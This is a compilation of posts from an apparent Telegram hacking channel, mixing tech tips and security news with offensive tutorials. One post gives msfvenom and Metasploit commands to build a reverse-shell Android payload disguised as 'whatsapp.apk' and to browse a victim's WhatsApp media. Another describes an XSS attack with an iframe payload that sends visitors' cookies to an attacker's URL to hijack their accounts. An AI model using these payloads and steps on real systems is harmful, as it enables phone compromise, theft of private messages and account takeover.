▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Change PHP's default Fastcgi mode to ISAPI mode (only run in Windows environment)

1) Download the ZIP file package of PHP at http://www.php.net (note that the version should correspond)

2) Copy the php4isapi.dll in the sapi directory to the c:\php directory

3) Enter the virtual host "Website Management"-"Virtual Host" of the management platform--In the server settings, modify the PHP mapping to change the original:
.php,C:\PHP\php.exe,5,GET,HEAD,POST,TRACE|

4) Change Into:
.php,C:\PHP\php4isapi.dll,5,GET,HEAD,POST,TRACE|

(Required only for IIS 6) Open the IIS manager, click Web service extension, click the properties of php, "Required File"---Add in--Select "C:\PHP\php4isapi.dll", after confirming, PHP can call.

E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑JavaScript email attachments may carry malicious code ?

< Recently there has been a ransomware program called RAA, which is written entirely in JavaScript and can lock user files by using a strong encryption program.

> Most malicious software in Windows is written in a compiled language such as C or C++ and spread in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch or PowerShell.

> The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also directly execute .js files.

> Attackers have only recently started using this technique. Last month, Microsoft warned that js attachments in malicious emails might carry viruses, and ESET’s Security Research Institute also warned that some js attachments might run Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages by default. But RAA is different, this is malware written entirely in JavaScript.

> Experts technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.

> Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.

> According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.

> It is very unusual to include JavaScript attachments in emails, so users should avoid opening such files even if they are contained in .zip archives. .js files are rarely used in other places except in websites and browsers.

ENJOY ❤️👍🏻
written by kEIVEN
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack WhatsApp using Meterpreter in parrot linux or Kali Linux.

open terminal and type :
1️⃣Let's create a payload virus :

1) msfvenom -p android/meterpreter/reversetcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk

2) msfconsole

3) use exploit/multi/handler

4) set payload android/meterpreter/reversetcp

5) set lhost (YOUR IP)

6) exploit

7) cd /

8) ls -l

now you have been connected to the phone, now you have to take the data of his WhatsApp from his phone, for which first you have to go to the root files of his phone, whose command is given :

9) cd sdcard

10) ls -l

2️⃣ After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.

1) cd WhatsApp

2) ls -l

3) cd Media

4) ls -l

After coming inside WhatsApp, you will have some such files open in front of you, where you have to

go to the media folder.

5) cd WhatsApp \ Images

6) ls -l

(Like I will go to the image folder and download an image and show you the commands you will find)

> example download (YOUR FILE NAME)

7) file has been downloaded, this file will

come in the root folder in your Linux.

ENJOY ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.

🦑FEATURES :

-Finds more than 7000 working proxies from ~50 sources.

-Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).

-Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.

-Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.

-All proxies are checked to support Cookies and Referer (and POST requests if required).

Automatically removes duplicate proxies.

-Is asynchronous.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) To install last stable release from pypi:

$ pip install proxybroker

2) MANUAL INSTALL :

$ pip install -U git+https://github.com/constverum/ProxyBroker.git

3) Find and save to a file 10 US proxies (without a check):

$ proxybroker grab --countries US --limit 10 --outfile ./proxies.txt

4) Serve
Run a local proxy server that distributes incoming requests to a pool of found HTTP(S) proxies with the high level of anonymity:

$ proxybroker serve --host 127.0.0.1 --port 8888 --types HTTP HTTPS --lvl High

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WEBSITE HACKING METHODE

1) Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is not vulnerable to a cross-site scripting attack, then this will not work.


2)
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
You'll want to test to see if the system filters out code. Post
<script>window.alert("test")</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.

3)
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.

4) Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.

@UndercodeTesting
(source wiki)
enjoy
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SPEED UP DOWNLOAD SPEED


use the correct channel type for your router

Test a different modem/router. The biggest cause of slowed down

internet is a bad modem.

Scan for viruses.

Check for on-system interference.

Check your filters.

Try getting rid of your cordless phone

Plug in.

Check for external interference.

Check for Foxtel or other types of TV.

use interent download manager

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

24/24 posts enjoy & share us ❤️👍🏻

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Optimize your devices' DNS :-Speedup net speed :


I'm using Cloudflare as an example, but these techniques will work with any DNS provider.

1️⃣ROUTER
If you're using a router for your office network DNS settings—and you probably are—log into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:

1) For IPv4: 1.1.1.1 and 1.0.0.1

2) For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.

🅰️WINDOWS
With Windows 10:

1) Click on the Start menu.

2) Click on the Settings icon.

3) Click on Network & Internet.

4) Click on Change adapter options.

5) Double-click on the active network adapter.

6) Write down any existing DNS server entries for future reference.

7) Click Use The Following DNS Server Addresses.

8) Replace those addresses with the 1.1.1.1 DNS addresses:

> For IPv4: 1.1.1.1 and 1.0.0.1

> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

🅱️With Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:

1) Click on Network and Internet.

2) Click on Change Adapter Settings.

3) Right click on the Wi-Fi network you are connected to, then click Properties.

4) Select Internet Protocol Version 4 (or Version 6 if desired).

5) Click Properties.

6) Write down any existing DNS server entries for future reference.

7) Click Use The Following DNS Server Addresses.

8) Replace those addresses with the 1.1.1.1 DNS addresses:

> For IPv4: 1.1.1.1 and 1.0.0.1

> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

WELL DONE

E N J O Y ❤️👍🏻
wiki source
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑As a smart contract platform, what are the advantages of BSV?

> Almost all DeFi projects are now on Ethereum. Will the future smart contract platform always be Ethereum?

> Objectively speaking, I think there is a 70% chance that it will still be Ethereum. The premise is that the development of Ethereum 2.0 is smooth. The existing moat of Ethereum is very high, but there are many shortcomings, so it is urgent to upgrade to 2.0 to change everything.

> I think the remaining probability can be given to BSV and DOT.

Needless to say, DOT is actually a faster-moving Ethereum 2.0, the ultimate sharding system, but compared to Ethereum, there are not so many developers and consensus, and it is difficult to replace it.

> If there is a small probability event, BSV is very likely. I am still very optimistic about the BSV smart contract platform.

> The advantage of BSV is that the contract only has operation instructions and results on the chain, and the process is calculated by itself, while Ethereum is the entire chain.

> BSV takes the route of on-demand verification. If you think the result of this contract is related to your interests, you can count it. You only need to compare the results to find out. Those who need it will follow the calculation. There is no need for the whole network to be brainless. Calculate together, this is more efficient.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Mirai botnet exploits CVE-2020-5902 vulnerability to attack IoT devices
#News

> After the first disclosure of two F5 BIG-IP vulnerabilities in the first week of July , we continued to monitor and analyze these vulnerabilities and other related activities to further understand their severity. According to the workaround released for CVE-2020-5902 , we found an Internet of Things (IoT) Mirai botnet downloader (detected by Trend Micro as Trojan.SH.MIRAI.BOI ), which can be added to new malware Scan in the variant to expose the Big-IP box.

> The samples discovered this time also attempt to exploit the newly disclosed unpatched vulnerabilities. It is recommended that system administrators and individuals using related equipment immediately patch their respective tools.

🦑conventional
As previously reported , this security vulnerability involves a remote code execution (RCE) vulnerability in the BIG-IP management interface, namely the Traffic Management User Interface (TMUI). After analyzing the published information , we noticed from the Apache httpd mitigation rules that one way to exploit this vulnerability is to include an HTTP GET request containing a semicolon character in the URI. In the Linux command line, the semicolon sends a signal to the interpreter that the command line has been completed, which is a character that the vulnerability needs to trigger.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST MAC-SPOOFER APPS FOR WINDOWS :

(remember mac spoofing in any linux & windows can be done without any extra software from settings-configuration let's share some windows apps for automate this small process😉)

1) https://technitium.com/tmac/

2) http://www.klcconsulting.net/smac/

3) http://www.softpedia.com/get/Network-Tools/Misc-Networking-Tools/Win7-MAC-Changer.shtml ( recommended for old windows )

4) http://www.softpedia.com/get/PORTABLE-SOFTWARE/Network/Portable-Spoof-Me-Now.shtml

5) https://madmacs.en.uptodown.com/

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST FILE SHARING FOR ANDROID 2020 :

> https://play.google.com/store/apps/details?id=com.lenovo.anyshare.gps

> https://play.google.com/store/apps/details?id=com.majedev.superbeam

> https://play.google.com/store/apps/details?id=com.sand.airdroid

> https://play.google.com/store/apps/details?id=cn.xender

>https://play.google.com/store/apps/details?id=com.dewmobile.kuaiya.play

> https://play.google.com/store/search?q=Send%20Anywhere&c=apps

> https://play.google.com/store/apps/details?id=com.xiaomi.midrop

> https://play.google.com/store/apps/details?id=org.mozilla.firefoxsend

> https://play.google.com/store/apps/details?id=com.wetransfer.app.live

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁